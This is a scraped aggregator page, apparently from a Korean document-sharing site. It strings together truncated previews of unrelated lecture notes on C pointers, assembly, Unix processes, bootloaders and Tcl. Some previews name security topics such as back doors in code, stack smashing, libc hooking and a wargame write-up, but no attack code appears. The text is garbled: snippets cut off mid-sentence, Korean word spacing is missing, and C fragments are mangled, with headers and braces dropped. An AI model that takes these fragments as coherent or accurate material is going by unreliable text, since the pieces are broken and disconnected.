Copyright, 2017 Multimedia Lab., UOS 시스템프로그래밍 (Assembly Code and Calling Convention) Seong Jong Choi chois@uos.ac.kr Multimedia Lab. Dept. of Electrical and Computer Eng. University of Seoul Seoul, Korea
More information금오공대 컴퓨터공학전공 강의자료
C 프로그래밍프로젝트 Chap 14. 포인터와함수에대한이해 2013.10.09. 오병우 컴퓨터공학과 14-1 함수의인자로배열전달 기본적인인자의전달방식 값의복사에의한전달 val 10 a 10 11 Department of Computer Engineering 2 14-1 함수의인자로배열전달 배열의함수인자전달방식 배열이름 ( 배열주소, 포인터 ) 에의한전달 #include
More information1. 안드로이드개발환경설정 안드로이드개발을위해선툴체인을비롯한다양한소프트웨어패키지가필요합니다 툴체인 (Cross-Compiler) 설치 안드로이드 2.2 프로요부터는소스에기본툴체인이 prebuilt 라는이름으로포함되어있지만, 리눅스 나부트로더 (U-boot)
1. 안드로이드개발환경설정 안드로이드개발을위해선툴체인을비롯한다양한소프트웨어패키지가필요합니다. 1.1. 툴체인 (Cross-Compiler) 설치 안드로이드 2.2 프로요부터는소스에기본툴체인이 prebuilt 라는이름으로포함되어있지만, 리눅스 나부트로더 (U-boot) 만별도로필요한경우도있어툴체인설치및설정에대해알아봅니다. 1.1.1. 툴체인설치 다음링크에서다운받을수있습니다.
More information슬라이드 1
-Part3- 제 4 장동적메모리할당과가변인 자 학습목차 4.1 동적메모리할당 4.1 동적메모리할당 4.1 동적메모리할당 배울내용 1 프로세스의메모리공간 2 동적메모리할당의필요성 4.1 동적메모리할당 (1/6) 프로세스의메모리구조 코드영역 : 프로그램실행코드, 함수들이저장되는영역 스택영역 : 매개변수, 지역변수, 중괄호 ( 블록 ) 내부에정의된변수들이저장되는영역
More information슬라이드 1
/ 유닉스시스템개요 / 파일 / 프로세스 01 File Descriptor file file descriptor file type unix 에서의파일은단지바이트들의나열임 operating system 은파일에어떤포맷도부과하지않음 파일의내용은바이트단위로주소를줄수있음 file descriptor 는 0 이나양수임 file 은 open 이나 creat 로 file
More informationC 프로그래밍 언어 입문 C 프로그래밍 언어 입문 김명호저 숭실대학교 출판국 머리말..... C, C++, Java, Fortran, Python, Ruby,.. C. C 1972. 40 C.. C. 1999 C99. C99. C. C. C., kmh ssu.ac.kr.. ,. 2013 12 Contents 1장 프로그래밍 시작 1.1 C 10 1.2 12
More informationIT CookBook, 정보보안개론 ( 개정판 ) [ 강의교안이용안내 ] 본강의교안의저작권은한빛아카데미 에있습니다. 이자료를무단으로전제하거나배포할경우저작권법 136 조에의거하여최고 5 년이하의징역또는 5 천만원이하의벌금에처할수있고이를병과 ( 倂科 ) 할수도있습니다.
IT CookBook, 정보보안개론 ( 개정판 ) [ 강의교안이용안내 ] 본강의교안의저작권은한빛아카데미 에있습니다. 이자료를무단으로전제하거나배포할경우저작권법 136 조에의거하여최고 5 년이하의징역또는 5 천만원이하의벌금에처할수있고이를병과 ( 倂科 ) 할수도있습니다. Chapter 05. 코드보안 : 코드속에뒷길을만드는기술 1. 시스템과프로그램에대한이해 2.
More informationMicrosoft PowerPoint APUE(Intro).ppt
컴퓨터특강 () [Ch. 1 & Ch. 2] 2006 년봄학기 문양세강원대학교컴퓨터과학과 APUE 강의목적 UNIX 시스템프로그래밍 file, process, signal, network programming UNIX 시스템의체계적이해 시스템프로그래밍능력향상 Page 2 1 APUE 강의동기 UNIX 는인기있는운영체제 서버시스템 ( 웹서버, 데이터베이스서버
More information[8051] 강의자료.PDF
CY AC F0 RS1 RS0 OV - P 0xFF 0x80 0x7F 0x30 0x2F 0x20 0x1F 0x18 0x17 0x10 0x0F 0x08 0x07 0x00 0x0000 0x0FFF 0x1000 0xFFFF 0x0000 0xFFFF RAM SFR SMOD - - - GF1 GF0 PD IDL 31 19 18 9 12 13 14 15 1 2 3 4
More informationTcl의 문법
월, 01/28/2008-20:50 admin 은 상당히 단순하고, 커맨드의 인자를 스페이스(공백)로 단락을 짓고 나열하는 정도입니다. command arg1 arg2 arg3... 한행에 여러개의 커맨드를 나열할때는, 세미콜론( ; )으로 구분을 짓습니다. command arg1 arg2 arg3... ; command arg1 arg2 arg3... 한행이
More informationMicrosoft PowerPoint - chap13-입출력라이브러리.pptx
#include int main(void) int num; printf( Please enter an integer: "); scanf("%d", &num); if ( num < 0 ) printf("is negative.\n"); printf("num = %d\n", num); return 0; 1 학습목표 스트림의 기본 개념을 알아보고,
More informationch15
쉽게풀어쓴 C 언어 Express 제 14 장포인터활용 C Express 이중포인터 이중포인터 (double pointer) : 포인터를가리키는포인터 int i = 10; int *p = &i; int **q = &p; // i 는 int 형변수 // p 는 i 를가리키는포인터 // q 는포인터 p 를가리키는이중포인터 이중포인터 이중포인터의해석 이중포인터 //
More informationIDA 5.x Manual 07.02.hwp
IDA 5.x Manual - Manual 01 - 영리를 목적으로 한 곳에서 배포금지 Last Update 2007. 02 이강석 / certlab@gmail.com 어셈블리어 개발자 그룹 :: 어셈러브 http://www.asmlove.co.kr - 1 - IDA Pro 는 Disassembler 프로그램입니다. 기계어로 되어있는 실행파일을 어셈블리언어
More informationPowerPoint 프레젠테이션
BOOTLOADER Jo, Heeseung 부트로더컴파일 부트로더소스복사및압축해제 부트로더소스는웹페이지에서다운로드 /working 디렉터리로이동한후, wget으로다운로드 이후작업은모두 /working 디렉터리에서진행 root@ubuntu:# cp /media/sm5-linux-111031/source/platform/uboot-s4210.tar.bz2 /working
More informationMicrosoft Word - FS_ZigBee_Manual_V1.3.docx
FirmSYS Zigbee etworks Kit User Manual FS-ZK500 Rev. 2008/05 Page 1 of 26 Version 1.3 목 차 1. 제품구성... 3 2. 개요... 4 3. 네트워크 설명... 5 4. 호스트/노드 설명... 6 네트워크 구성... 6 5. 모바일 태그 설명... 8 6. 프로토콜 설명... 9 프로토콜 목록...
More informationMicrosoft PowerPoint - Lecture_Note_7.ppt [Compatibility Mode]
Unix Process Department of Computer Engineering Kyung Hee University. Choong Seon Hong 1 유닉스기반다중서버구현방법 클라이언트들이동시에접속할수있는서버 서비스를동시에처리할수있는서버프로세스생성을통한멀티태스킹 (Multitasking) 서버의구현 select 함수에의한멀티플렉싱 (Multiplexing)
More informationA Dynamic Grid Services Deployment Mechanism for On-Demand Resource Provisioning
C Programming Practice (II) Contents 배열 문자와문자열 구조체 포인터와메모리관리 구조체 2/17 배열 (Array) (1/2) 배열 동일한자료형을가지고있으며같은이름으로참조되는변수들의집합 배열의크기는반드시상수이어야한다. type var_name[size]; 예 ) int myarray[5] 배열의원소는원소의번호를 0 부터시작하는색인을사용
More information4. #include <stdio.h> #include <stdlib.h> int main() { functiona(); } void functiona() { printf("hihi\n"); } warning: conflicting types for functiona
이름 : 학번 : A. True or False: 각각항목마다 True 인지 False 인지적으세요. 1. (Python:) randint 함수를사용하려면, random 모듈을 import 해야한다. 2. (Python:) '' (single quote) 는한글자를표현할때, (double quote) 는문자열을표현할때사용한다. B. 다음에러를수정하는방법을적으세요.
More informationMicrosoft Word - ntasFrameBuilderInstallGuide2.5.doc
NTAS and FRAME BUILDER Install Guide NTAS and FRAME BUILDER Version 2.5 Copyright 2003 Ari System, Inc. All Rights reserved. NTAS and FRAME BUILDER are trademarks or registered trademarks of Ari System,
More information(Asynchronous Mode) ( 1, 5~8, 1~2) & (Parity) 1 ; * S erial Port (BIOS INT 14H) - 1 -
(Asynchronous Mode) - - - ( 1, 5~8, 1~2) & (Parity) 1 ; * S erial Port (BIOS INT 14H) - 1 - UART (Univ ers al As y nchronous Receiver / T rans mitter) 8250A 8250A { COM1(3F8H). - Line Control Register
More informationPowerPoint 프레젠테이션
Text-LCD Device Control - Device driver Jo, Heeseung M3 모듈에장착되어있는 Tedxt LCD 장치를제어하는 App 을개발 TextLCD 는영문자와숫자일본어, 특수문자를표현하는데사용되는디바이스 HBE-SM5-S4210 의 TextLCD 는 16 문자 *2 라인을 Display 할수있으며, 이 TextLCD 를제어하기위하여
More informationuntitled
시스템소프트웨어 : 운영체제, 컴파일러, 어셈블러, 링커, 로더, 프로그래밍도구등 소프트웨어 응용소프트웨어 : 워드프로세서, 스프레드쉬트, 그래픽프로그램, 미디어재생기등 1 n ( x + x +... + ) 1 2 x n 00001111 10111111 01000101 11111000 00001111 10111111 01001101 11111000
More informationSmashing The Stack For Fun And Profit by Aleph One
Review of Aleph One s Smashing The Stack For Fun And Profit by vangelis(vangelis@wowsecurity.org) 888 888 888 888 888 888 888 888 888.d88b. 888 888 888 88888b. 8888b..d8888b 888 888.d88b. 888d888 888 888
More information<4D F736F F F696E74202D20C1A63134C0E520C6F7C0CEC5CD5FC8B0BFEB>
쉽게풀어쓴 C 언어 Express 제 14 장포인터활용 이중포인터 이중포인터 (double pointer) : 포인터를가리키는포인터 int i = 10; int *p = &i; int **q = &p; // i 는 int 형변수 // p 는 i 를가리키는포인터 // q 는포인터 p 를가리키는이중포인터 이중포인터 이중포인터의해석 이중포인터 // 이중포인터프로그램
More informationPowerPoint 프레젠테이션
Development Environment 2 Jo, Heeseung make make Definition make is utility to maintain groups of programs Object If some file is modified, make detects it and update files related with modified one It
More information휠세미나3 ver0.4
andromeda@sparcs:/$ ls -al dev/sda* brw-rw---- 1 root disk 8, 0 2014-06-09 18:43 dev/sda brw-rw---- 1 root disk 8, 1 2014-06-09 18:43 dev/sda1 brw-rw---- 1 root disk 8, 2 2014-06-09 18:43 dev/sda2 andromeda@sparcs:/$
More informationMicrosoft PowerPoint - [2009] 02.pptx
원시데이터유형과연산 원시데이터유형과연산 원시데이터유형과연산 숫자데이터유형 - 숫자데이터유형 원시데이터유형과연산 표준입출력함수 - printf 문 가장기본적인출력함수. (stdio.h) 문법 ) printf( Test printf. a = %d \n, a); printf( %d, %f, %c \n, a, b, c); #include #include
More informationPowerPoint 프레젠테이션
DEVELOPMENT ENVIRONMENT 2 MAKE Jo, Heeseung MAKE Definition make is utility to maintain groups of programs Object If some file is modified, make detects it and update files related with modified one 2
More information10.
10. 10.1 10.2 Library Routine: void perror (char* str) perror( ) str Error 0 10.3 10.3 int fd; /* */ fd = open (filename, ) /*, */ if (fd = = -1) { /* */ } fcnt1 (fd, ); /* */ read (fd, ); /* */ write
More informationMODBUS SERVO DRIVER( FDA7000 Series ) STANDARD PROTOCOL (Ver 1.00) 1
SERVO DRIVER( FDA7000 Series ) STANDARD PROTOCOL (Ver 100) 1 Contents 1 INTRODUCTION 2 PROTOCOL FRAME OUTLINE 3 FUNCTION FIELD 4 DATA FIELD 5 CRC CHECK 6 FUNCTION EXAM 7 EXCEPTION RESPONSE 8 I/O STATUS
More informationMicrosoft PowerPoint - comp_prac_081223_2.pptx
Computer Programming Practice (2008 Winter) Practice 2 기본 Unix/Linux 명령어숙지 2008. 12. 23 Contents Linux commands Basic commands File and Directory User Data Filtering Process Etc Conclusion & Recommended
More informationC 언어 프로그래밊 과제 풀이
과제풀이 (1) 홀수 / 짝수판정 (1) /* 20094123 홍길동 20100324 */ /* even_or_odd.c */ /* 정수를입력받아홀수인지짝수인지판정하는프로그램 */ int number; printf(" 정수를입력하시오 => "); scanf("%d", &number); 확인 주석문 가필요한이유 printf 와 scanf 쌍
More information기술문서 LD_PRELOAD 와공유라이브러리를사용한 libc 함수후킹 정지훈
기술문서 LD_PRELOAD 와공유라이브러리를사용한 libc 함수후킹 정지훈 binoopang@is119.jnu.ac.kr Abstract libc에서제공하는 API를후킹해본다. 물론이방법을사용하면다른라이브러리에서제공하는 API들도후킹할수있다. 여기서제시하는방법은리눅스후킹에서가장기본적인방법이될것이기때문에후킹의워밍업이라고생각하고읽어보자 :D Content 1.
More informationContents 1. 목적 풀이 Level
FTZ 풀이보고서 Moomoo/badass4514@gmail.com 1 Contents 1. 목적 -------------------------------------------------------------- 3 2. 풀이 Level1 -----------------------------------------------------------------------
More informationMicrosoft PowerPoint - a8a.ppt [호환 모드]
이장의내용 8 장고급프로시저 스택프레임 재귀 (Recursion) Invoke, Addr, Proc, Proto 디렉티브 다중모듈프로그램작성 2 8.2 스택프레임 Stack Frame ( 또는 activation record) procedure 의다음사항을저장한 영역 urn address passed parameter ( 스택매개변수 ) saved register
More informationuntitled
Step Motor Device Driver Embedded System Lab. II Step Motor Step Motor Step Motor source Embedded System Lab. II 2 open loop, : : Pulse, 1 Pulse,, -, 1 +5%, step Step Motor (2),, Embedded System Lab. II
More information< E20C6DFBFFEBEEE20C0DBBCBAC0BB20C0A7C7D12043BEF0BEEE20492E707074>
Chap #2 펌웨어작성을위한 C 언어 I http://www.smartdisplay.co.kr 강의계획 Chap1. 강의계획및디지털논리이론 Chap2. 펌웨어작성을위한 C 언어 I Chap3. 펌웨어작성을위한 C 언어 II Chap4. AT89S52 메모리구조 Chap5. SD-52 보드구성과코드메모리프로그래밍방법 Chap6. 어드레스디코딩 ( 매핑 ) 과어셈블리어코딩방법
More informationC++ Programming
C++ Programming 예외처리 Seo, Doo-okok clickseo@gmail.com http://www.clickseo.com 목 차 예외처리 2 예외처리 예외처리 C++ 의예외처리 예외클래스와객체 3 예외처리 예외를처리하지않는프로그램 int main() int a, b; cout > a >> b; cout
More information<4D F736F F F696E74202D FC7C1B7CEBCBCBDBA20BBFDBCBAB0FA20BDC7C7E0205BC8A3C8AF20B8F0B5E55D>
학습목표 프로세스를생성하는방법을이해한다. 프로세스를종료하는방법을이해한다. exec함수군으로새로운프로그램을실행하는방법을이해한다. 프로세스를동기화하는방법을이해한다. 프로세스생성과실행 IT CookBook, 유닉스시스템프로그래밍 2/24 목차 프로세스생성 프로세스종료함수 exec 함수군활용 exec 함수군과 fork 함수 프로세스동기화 프로세스생성 [1] 프로그램실행
More information2009년 상반기 사업계획
프로세스생성과실행 IT CookBook, 유닉스시스템프로그래밍 학습목표 프로세스를생성하는방법을이해한다. 프로세스를종료하는방법을이해한다. exec함수군으로새로운프로그램을실행하는방법을이해한다. 프로세스를동기화하는방법을이해한다. 2/24 목차 프로세스생성 프로세스종료함수 exec 함수군활용 exec 함수군과 fork 함수 프로세스동기화 3/24 프로세스생성 [1]
More information